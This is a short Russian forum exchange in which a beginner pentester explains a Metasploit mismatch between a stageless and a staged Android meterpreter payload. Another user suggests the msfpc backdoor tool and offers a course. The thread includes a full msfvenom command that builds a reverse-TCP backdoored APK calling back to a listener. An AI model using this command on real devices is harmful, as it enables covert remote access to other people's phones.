И так добрался до компа так вот в чем заключалась моя проблема это моя невнимательность.
в одном гайде изначально создавал apk файл таким образом
msfvenom -p android/meterpreter_reverse_tcp LHOST=10.10.0.6 LPORT=4444 R > avanger.apk
но как запускать полезную нагрузку я посмотрел другой гайд и там было
set payload android/meterpreter/reverse_tcp
и вот в чем разница, изначально не особо заметно но в msfconsole есть 2 пути к этому эксплоиту.
Так что можно считать тема закрыта проблема решена...
Ну это хорошо, бывает. Кстати, можешь познакомится с командой msfpc, тоже создает бэкдоры и он весьма прост в использований. Так что, советую познакомится с ним).
Спасибо большое, обязательно познакомлюсь, только начал путь пентестера)
Похвально, путь будет интересным). Тебе случаем курс по metasploit не нужен? курс хоть и 2015 года, но познакомит с metasploit хорошо, сам после курса узнал много нового про него).